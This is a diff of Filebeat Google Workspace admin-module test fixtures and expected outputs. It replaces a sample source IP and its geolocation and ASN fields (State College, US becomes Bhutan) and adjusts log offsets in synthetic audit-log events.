-        "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"ORG_SETTINGS\",\"name\":\"MOVE_ORG_UNIT\",\"parameters\":[{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"ORG_UNIT_NAME\",\"value\":\"org\"}]}}",
+        "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"ORG_SETTINGS\",\"name\":\"MOVE_ORG_UNIT\",\"parameters\":[{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"ORG_UNIT_NAME\",\"value\":\"org\"}]}}",
         "event.provider": "admin",
         "event.type": [
             "change"
@@ -710,26 +658,22 @@
         "google_workspace.kind": "admin#reports#activity",
         "google_workspace.organization.domain": "elastic.com",
         "input.type": "log",
-        "log.offset": 5479,
+        "log.offset": 5466,
         "organization.id": "1",
         "related.ip": [
-            "98.235.162.24"
+            "67.43.156.13"
         ],
         "related.user": [
             "foo"
         ],
         "service.type": "google_workspace",
-        "source.as.number": 7922,
-        "source.as.organization.name": "Comcast Cable Communications, LLC",
-        "source.geo.city_name": "State College",
-        "source.geo.continent_name": "North America",
-        "source.geo.country_iso_code": "US",
-        "source.geo.country_name": "United States",
-        "source.geo.location.lat": 40.7957,
-        "source.geo.location.lon": -77.8618,
-        "source.geo.region_iso_code": "US-PA",
-        "source.geo.region_name": "Pennsylvania",
-        "source.ip": "98.235.162.24",
+        "source.as.number": 35908,
+        "source.geo.continent_name": "Asia",
+        "source.geo.country_iso_code": "BT",
+        "source.geo.country_name": "Bhutan",
+        "source.geo.location.lat": 27.5,
+        "source.geo.location.lon": 90.5,
+        "source.ip": "67.43.156.13",
         "source.user.domain": "bar.com",
         "source.user.email": "foo@bar.com",
         "source.user.id": "1",
@@ -750,7 +694,7 @@
         "event.dataset": "google_workspace.admin",
         "event.id": "1",
         "event.module": "google_workspace",
-        "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"ORG_SETTINGS\",\"name\":\"EDIT_ORG_UNIT_NAME\",\"parameters\":[{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"ORG_UNIT_NAME\",\"value\":\"org\"}]}}",
+        "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"ORG_SETTINGS\",\"name\":\"EDIT_ORG_UNIT_NAME\",\"parameters\":[{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"ORG_UNIT_NAME\",\"value\":\"org\"}]}}",
         "event.provider": "admin",
         "event.type": [
             "change"
@@ -763,26 +707,22 @@
         "google_workspace.kind": "admin#reports#activity",
         "google_workspace.organization.domain": "elastic.com",
         "input.type": "log",
-        "log.offset": 5880,
+        "log.offset": 5866,
         "organization.id": "1",
         "related.ip": [
-            "98.235.162.24"
+            "67.43.156.13"
         ],
         "related.user": [
             "foo"
         ],
         "service.type": "google_workspace",
-        "source.as.number": 7922,
-        "source.as.organization.name": "Comcast Cable Communications, LLC",
-        "source.geo.city_name": "State College",
-        "source.geo.continent_name": "North America",
-        "source.geo.country_iso_code": "US",
-        "source.geo.country_name": "United States",
-        "source.geo.location.lat": 40.7957,
-        "source.geo.location.lon": -77.8618,
-        "source.geo.region_iso_code": "US-PA",
-        "source.geo.region_name": "Pennsylvania",
-        "source.ip": "98.235.162.24",
+        "source.as.number": 35908,
+        "source.geo.continent_name": "Asia",
+        "source.geo.country_iso_code": "BT",
+        "source.geo.country_name": "Bhutan",
+        "source.geo.location.lat": 27.5,
+        "source.geo.location.lon": 90.5,
+        "source.ip": "67.43.156.13",
         "source.user.domain": "bar.com",
         "source.user.email": "foo@bar.com",
         "source.user.id": "1",
@@ -803,7 +743,7 @@
         "event.dataset": "google_workspace.admin",
         "event.id": "1",
         "event.module": "google_workspace",
-        "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"ORG_SETTINGS\",\"name\":\"REVOKE_DEVICE_ENROLLMENT_TOKEN\",\"parameters\":[{\"name\":\"FULL_ORG_UNIT_PATH\",\"value\":\"full/org/path\"}]}}",
+        "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"ORG_SETTINGS\",\"name\":\"REVOKE_DEVICE_ENROLLMENT_TOKEN\",\"parameters\":[{\"name\":\"FULL_ORG_UNIT_PATH\",\"value\":\"full/org/path\"}]}}",
         "event.provider": "admin",
         "event.type": [
             "change"
@@ -815,26 +755,22 @@
         "google_workspace.kind": "admin#reports#activity",
         "google_workspace.organization.domain": "elastic.com",
         "input.type": "log",
-        "log.offset": 6286,
+        "log.offset": 6271,
         "organization.id": "1",
         "related.ip": [
-            "98.235.162.24"
+            "67.43.156.13"
         ],
         "related.user": [
             "foo"
         ],
         "service.type": "google_workspace",
-        "source.as.number": 7922,
-        "source.as.organization.name": "Comcast Cable Communications, LLC",
-        "source.geo.city_name": "State College",
-        "source.geo.continent_name": "North America",
-        "source.geo.country_iso_code": "US",
-        "source.geo.country_name": "United States",
-        "source.geo.location.lat": 40.7957,
-        "source.geo.location.lon": -77.8618,
-        "source.geo.region_iso_code": "US-PA",
-        "source.geo.region_name": "Pennsylvania",
-        "source.ip": "98.235.162.24",
+        "source.as.number": 35908,
+        "source.geo.continent_name": "Asia",
+        "source.geo.country_iso_code": "BT",
+        "source.geo.country_name": "Bhutan",
+        "source.geo.location.lat": 27.5,
+        "source.geo.location.lon": 90.5,
+        "source.ip": "67.43.156.13",
         "source.user.domain": "bar.com",
         "source.user.email": "foo@bar.com",
         "source.user.id": "1",
@@ -855,7 +791,7 @@
         "event.dataset": "google_workspace.admin",
         "event.id": "1",
         "event.module": "google_workspace",
-        "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"ORG_SETTINGS\",\"name\":\"TOGGLE_SERVICE_ENABLED\",\"parameters\":[{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"},{\"name\":\"GROUP_EMAIL\",\"value\":\"group@example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"ORG_UNIT_NAME\",\"value\":\"org\"},{\"name\":\"SERVICE_NAME\",\"value\":\"new\"}]}}",
+        "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"ORG_SETTINGS\",\"name\":\"TOGGLE_SERVICE_ENABLED\",\"parameters\":[{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"},{\"name\":\"GROUP_EMAIL\",\"value\":\"group@example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"ORG_UNIT_NAME\",\"value\":\"org\"},{\"name\":\"SERVICE_NAME\",\"value\":\"new\"}]}}",
         "event.provider": "admin",
         "event.type": [
             "change"
@@ -873,26 +809,22 @@
         "group.domain": "example.com",
         "group.name": "group",
         "input.type": "log",
-        "log.offset": 6684,
+        "log.offset": 6668,
         "organization.id": "1",
         "related.ip": [
-            "98.235.162.24"
+            "67.43.156.13"
         ],
         "related.user": [
             "foo"
         ],
         "service.type": "google_workspace",
-        "source.as.number": 7922,
-        "source.as.organization.name": "Comcast Cable Communications, LLC",
-        "source.geo.city_name": "State College",
-        "source.geo.continent_name": "North America",
-        "source.geo.country_iso_code": "US",
-        "source.geo.country_name": "United States",
-        "source.geo.location.lat": 40.7957,
-        "source.geo.location.lon": -77.8618,
-        "source.geo.region_iso_code": "US-PA",
-        "source.geo.region_name": "Pennsylvania",
-        "source.ip": "98.235.162.24",
+        "source.as.number": 35908,
+        "source.geo.continent_name": "Asia",
+        "source.geo.country_iso_code": "BT",
+        "source.geo.country_name": "Bhutan",
+        "source.geo.location.lat": 27.5,
+        "source.geo.location.lon": 90.5,
+        "source.ip": "67.43.156.13",
         "source.user.domain": "bar.com",
         "source.user.email": "foo@bar.com",
         "source.user.id": "1",
diff --git a/x-pack/filebeat/module/google_workspace/admin/test/admin-security-test.json.log b/x-pack/filebeat/module/google_workspace/admin/test/admin-security-test.json.log
index 1035f42a2fbe..1a75621dca4e 100644
--- a/x-pack/filebeat/module/google_workspace/admin/test/admin-security-test.json.log
+++ b/x-pack/filebeat/module/google_workspace/admin/test/admin-security-test.json.log
@@ -1,24 +1,24 @@
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"SECURITY_SETTINGS","name":"ALLOW_STRONG_AUTHENTICATION","parameters":[{"name":"DOMAIN_NAME","value":"example.com"},{"name":"NEW_VALUE","value":"new"},{"name":"OLD_VALUE","value":"old"}]}}
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"SECURITY_SETTINGS","name":"ALLOW_SERVICE_FOR_OAUTH2_ACCESS","parameters":[{"name":"OAUTH2_SERVICE_NAME","value":"APPS_SCRIPT"},{"name":"ORG_UNIT_NAME","value":"org"}]}}
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"SECURITY_SETTINGS","name":"DISALLOW_SERVICE_FOR_OAUTH2_ACCESS","parameters":[{"name":"OAUTH2_SERVICE_NAME","value":"APPS_SCRIPT"},{"name":"ORG_UNIT_NAME","value":"org"}]}}
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"SECURITY_SETTINGS","name":"CHANGE_APP_ACCESS_SETTINGS_COLLECTION_ID","parameters":[{"name":"ORG_UNIT_NAME","value":"org"},{"name":"SETTING_NAME","value":"setting"},{"name":"DOMAIN_NAME","value":"example.com"},{"name":"NEW_VALUE","value":"new"},{"name":"OLD_VALUE","value":"old"}]}}
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"SECURITY_SETTINGS","name":"ADD_TO_TRUSTED_OAUTH2_APPS","parameters":[{"name":"ORG_UNIT_NAME","value":"org"},{"name":"OAUTH2_APP_ID","value":"id"},{"name":"OAUTH2_APP_NAME","value":"appname"},{"name":"OAUTH2_APP_TYPE","value":"CHROME_EXTENSION"}]}}
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"SECURITY_SETTINGS","name":"REMOVE_FROM_TRUSTED_OAUTH2_APPS","parameters":[{"name":"ORG_UNIT_NAME","value":"org"},{"name":"OAUTH2_APP_ID","value":"id"},{"name":"OAUTH2_APP_NAME","value":"appname"},{"name":"OAUTH2_APP_TYPE","value":"CHROME_EXTENSION"}]}}
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"SECURITY_SETTINGS","name":"BLOCK_ON_DEVICE_ACCESS","parameters":[{"name":"OAUTH2_SERVICE_NAME","value":"APPS_SCRIPT"},{"name":"ORG_UNIT_NAME","value":"org"}]}}
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"SECURITY_SETTINGS","name":"CHANGE_TWO_STEP_VERIFICATION_ENROLLMENT_PERIOD_DURATION","parameters":[{"name":"ORG_UNIT_NAME","value":"org"},{"name":"GROUP_EMAIL","value":"group@example.com"},{"name":"NEW_VALUE","value":"new"},{"name":"OLD_VALUE","value":"old"}]}}
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"SECURITY_SETTINGS","name":"CHANGE_TWO_STEP_VERIFICATION_FREQUENCY","parameters":[{"name":"ORG_UNIT_NAME","value":"org"},{"name":"GROUP_EMAIL","value":"group@example.com"},{"name":"NEW_VALUE","value":"new"},{"name":"OLD_VALUE","value":"old"}]}}
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"SECURITY_SETTINGS","name":"CHANGE_TWO_STEP_VERIFICATION_GRACE_PERIOD_DURATION","parameters":[{"name":"ORG_UNIT_NAME","value":"org"},{"name":"GROUP_EMAIL","value":"group@example.com"},{"name":"NEW_VALUE","value":"new"},{"name":"OLD_VALUE","value":"old"}]}}
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"SECURITY_SETTINGS","name":"CHANGE_TWO_STEP_VERIFICATION_START_DATE","parameters":[{"name":"ORG_UNIT_NAME","value":"org"},{"name":"GROUP_EMAIL","value":"group@example.com"},{"name":"NEW_VALUE","value":"new"},{"name":"OLD_VALUE","value":"old"}]}}
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"SECURITY_SETTINGS","name":"CHANGE_ALLOWED_TWO_STEP_VERIFICATION_METHODS","parameters":[{"name":"ORG_UNIT_NAME","value":"org"},{"name":"GROUP_EMAIL","value":"group@example.com"},{"name":"ALLOWED_TWO_STEP_VERIFICATION_METHOD","value":"ONLY_SECURITY_KEY"}]}}
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"SECURITY_SETTINGS","name":"TOGGLE_CAA_ENABLEMENT","parameters":[{"name":"NEW_VALUE","value":"new"}]}}
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"SECURITY_SETTINGS","name":"CHANGE_CAA_ERROR_MESSAGE","parameters":[{"name":"NEW_VALUE","value":"new"},{"name":"ORG_UNIT_NAME","value":"org"}]}}
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"SECURITY_SETTINGS","name":"CHANGE_CAA_APP_ASSIGNMENTS","parameters":[{"name":"APPLICATION_NAME","value":"app"},{"name":"CAA_ASSIGNMENTS_NEW","value":"new"},{"name":"CAA_ASSIGNMENTS_OLD","value":"old"},{"name":"GROUP_NAME","value":"group"},{"name":"ORG_UNIT_NAME","value":"org"}]}}
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"SECURITY_SETTINGS","name":"UNTRUST_DOMAIN_OWNED_OAUTH2_APPS","parameters":[{"name":"ORG_UNIT_NAME","value":"org"}]}}
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"SECURITY_SETTINGS","name":"TRUST_DOMAIN_OWNED_OAUTH2_APPS","parameters":[{"name":"ORG_UNIT_NAME","value":"org"}]}}
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"SECURITY_SETTINGS","name":"ENABLE_NON_ADMIN_USER_PASSWORD_RECOVERY","parameters":[{"name":"GROUP_EMAIL","value":"group@example.com"},{"name":"NEW_VALUE","value":"new"},{"name":"OLD_VALUE","value":"old"},{"name":"ORG_UNIT_NAME","value":"org"}]}}
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"SECURITY_SETTINGS","name":"ENFORCE_STRONG_AUTHENTICATION","parameters":[{"name":"DOMAIN_NAME","value":"example.com"},{"name":"GROUP_EMAIL","value":"group@example.com"},{"name":"NEW_VALUE","value":"new"},{"name":"OLD_VALUE","value":"old"},{"name":"ORG_UNIT_NAME","value":"org"},{"name":"SETTING_NAME","value":"setting"}]}}
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"SECURITY_SETTINGS","name":"UPDATE_ERROR_MSG_FOR_RESTRICTED_OAUTH2_APPS","parameters":[{"name":"NEW_VALUE","value":"new"},{"name":"OLD_VALUE","value":"old"},{"name":"ORG_UNIT_NAME","value":"org"}]}}
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"SECURITY_SETTINGS","name":"WEAK_PROGRAMMATIC_LOGIN_SETTINGS_CHANGED","parameters":[{"name":"GROUP_EMAIL","value":"group@example.com"},{"name":"NEW_VALUE","value":"new"},{"name":"OLD_VALUE","value":"old"},{"name":"ORG_UNIT_NAME","value":"org"}]}}
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"SECURITY_SETTINGS","name":"SESSION_CONTROL_SETTINGS_CHANGE","parameters":[{"name":"REAUTH_APPLICATION","value":"ADMIN_CONSOLE"},{"name":"REAUTH_SETTING_NEW","value":"INHERIT"},{"name":"REAUTH_SETTING_OLD","value":"NEVER"},{"name":"ORG_UNIT_NAME","value":"org"}]}}
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"SECURITY_SETTINGS","name":"CHANGE_SESSION_LENGTH","parameters":[{"name":"NEW_VALUE","value":"new"},{"name":"OLD_VALUE","value":"old"}]}}
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"SECURITY_SETTINGS","name":"UNBLOCK_ON_DEVICE_ACCESS","parameters":[{"name":"OAUTH2_SERVICE_NAME","value":"CALENDAR"},{"name":"ORG_UNIT_NAME","value":"org"}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"SECURITY_SETTINGS","name":"ALLOW_STRONG_AUTHENTICATION","parameters":[{"name":"DOMAIN_NAME","value":"example.com"},{"name":"NEW_VALUE","value":"new"},{"name":"OLD_VALUE","value":"old"}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"SECURITY_SETTINGS","name":"ALLOW_SERVICE_FOR_OAUTH2_ACCESS","parameters":[{"name":"OAUTH2_SERVICE_NAME","value":"APPS_SCRIPT"},{"name":"ORG_UNIT_NAME","value":"org"}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"SECURITY_SETTINGS","name":"DISALLOW_SERVICE_FOR_OAUTH2_ACCESS","parameters":[{"name":"OAUTH2_SERVICE_NAME","value":"APPS_SCRIPT"},{"name":"ORG_UNIT_NAME","value":"org"}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"SECURITY_SETTINGS","name":"CHANGE_APP_ACCESS_SETTINGS_COLLECTION_ID","parameters":[{"name":"ORG_UNIT_NAME","value":"org"},{"name":"SETTING_NAME","value":"setting"},{"name":"DOMAIN_NAME","value":"example.com"},{"name":"NEW_VALUE","value":"new"},{"name":"OLD_VALUE","value":"old"}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"SECURITY_SETTINGS","name":"ADD_TO_TRUSTED_OAUTH2_APPS","parameters":[{"name":"ORG_UNIT_NAME","value":"org"},{"name":"OAUTH2_APP_ID","value":"id"},{"name":"OAUTH2_APP_NAME","value":"appname"},{"name":"OAUTH2_APP_TYPE","value":"CHROME_EXTENSION"}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"SECURITY_SETTINGS","name":"REMOVE_FROM_TRUSTED_OAUTH2_APPS","parameters":[{"name":"ORG_UNIT_NAME","value":"org"},{"name":"OAUTH2_APP_ID","value":"id"},{"name":"OAUTH2_APP_NAME","value":"appname"},{"name":"OAUTH2_APP_TYPE","value":"CHROME_EXTENSION"}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"SECURITY_SETTINGS","name":"BLOCK_ON_DEVICE_ACCESS","parameters":[{"name":"OAUTH2_SERVICE_NAME","value":"APPS_SCRIPT"},{"name":"ORG_UNIT_NAME","value":"org"}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"SECURITY_SETTINGS","name":"CHANGE_TWO_STEP_VERIFICATION_ENROLLMENT_PERIOD_DURATION","parameters":[{"name":"ORG_UNIT_NAME","value":"org"},{"name":"GROUP_EMAIL","value":"group@example.com"},{"name":"NEW_VALUE","value":"new"},{"name":"OLD_VALUE","value":"old"}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"SECURITY_SETTINGS","name":"CHANGE_TWO_STEP_VERIFICATION_FREQUENCY","parameters":[{"name":"ORG_UNIT_NAME","value":"org"},{"name":"GROUP_EMAIL","value":"group@example.com"},{"name":"NEW_VALUE","value":"new"},{"name":"OLD_VALUE","value":"old"}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"SECURITY_SETTINGS","name":"CHANGE_TWO_STEP_VERIFICATION_GRACE_PERIOD_DURATION","parameters":[{"name":"ORG_UNIT_NAME","value":"org"},{"name":"GROUP_EMAIL","value":"group@example.com"},{"name":"NEW_VALUE","value":"new"},{"name":"OLD_VALUE","value":"old"}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"SECURITY_SETTINGS","name":"CHANGE_TWO_STEP_VERIFICATION_START_DATE","parameters":[{"name":"ORG_UNIT_NAME","value":"org"},{"name":"GROUP_EMAIL","value":"group@example.com"},{"name":"NEW_VALUE","value":"new"},{"name":"OLD_VALUE","value":"old"}]}}
